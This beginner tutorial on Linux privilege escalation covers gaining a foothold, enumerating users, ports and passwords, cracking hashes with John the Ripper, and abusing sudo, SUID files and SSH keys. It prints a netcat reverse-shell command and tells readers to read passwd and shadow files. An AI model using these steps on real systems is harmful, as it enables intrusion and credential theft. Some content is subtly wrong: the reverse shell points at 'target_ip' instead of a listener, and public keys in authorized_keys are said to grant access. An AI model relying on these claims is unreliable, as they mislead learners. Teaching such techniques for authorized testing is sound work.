Linux Privilege Escalation for Beginners
Table of Contents
Introduction
This tutorial covers the fundamentals of Linux privilege escalation, aimed at beginners who want to understand how to gain higher-level access within a Linux system. The techniques discussed are essential for ethical hacking, penetration testing, and security assessments. By the end of this guide, you'll have a solid foundation to explore further in the realm of cybersecurity.
Step 1: Gaining a Foothold
- Access the Shell: Start by obtaining shell access to the target system. This could be through methods like exploiting a vulnerability or using social engineering.
- Establish a Reverse Shell: Use a command to create a reverse shell to maintain access. Example command:
nc -e /bin/sh target_ip target_port
Step 2: System Enumeration
- Check System Information: Use commands like
uname -a
to gather system information. - Identify Running Services: Run
ps aux
to list all running processes and check for services that may have known vulnerabilities.
Step 3: User Enumeration
- List Users: Use the command
cat /etc/passwd
to display user information. - Identify Privileged Users: Look for users in the
sudo
orwheel
group, as these may have elevated privileges.
Step 4: Network Enumeration
- Check Open Ports: Use
netstat -tuln
to see which ports are open and which services are running on them. - Identify Active Connections: Use
lsof -i
to list open files and their network connections.
Step 5: Password Enumeration
- Check for Passwords: Look for files that may contain sensitive information, such as
shadow
orpasswd
files. - Use Tools: Tools like
John the Ripper
can be employed to crack passwords.
Step 6: Automated Tools Introduction
- Install Tools: Familiarize yourself with tools like
LinPEAS
andLinux Exploit Suggester
. - Run Tools: Execute these tools on the target system to automate the enumeration and vulnerability discovery processes.
Step 7: Kernel Exploits Overview
- Understand Kernel Versions: Use
uname -r
to find the kernel version and research known exploits for that version. - Execute Kernel Exploits: If applicable, utilize payloads designed for kernel vulnerabilities.
Step 8: Escalation via Passwords and File Permissions
- Stored Passwords: Check for files containing stored passwords and exploit any weak credentials.
- Weak File Permissions: Identify files with overly permissive access by using
ls -la
.
Step 9: Escalation via SSH Keys
- Check for SSH Keys: Look for SSH keys in
~/.ssh/authorized_keys
. If you find them, you can use them to gain access as another user. - Copy SSH Keys: If you have access, copy the keys to your own system.
Step 10: Sudo Overview
- Review Sudo Permissions: Use the command
sudo -l
to see which commands the current user can run with sudo. - Exploit Misconfigurations: If any commands are misconfigured, take advantage of that to escalate privileges.
Step 11: Escalation via SUID
- Identify SUID Files: Use
find / -perm -4000 -type f 2>/dev/null
to locate SUID files on the system. - Exploit SUID Programs: If you find vulnerable SUID programs, execute them to gain root access.
Step 12: Challenge Walkthrough
- Practical Application: Follow through a practical challenge to apply what you've learned. Attempt to identify and exploit vulnerabilities as outlined in previous steps.
Conclusion
In this tutorial, we've covered the basics of Linux privilege escalation, including techniques for gaining access, enumerating systems and users, and exploiting vulnerabilities. As a next step, consider practicing these techniques in a controlled environment like a virtual lab or using platforms like Hack The Box. Continuous learning and hands-on practice are key to mastering Linux security.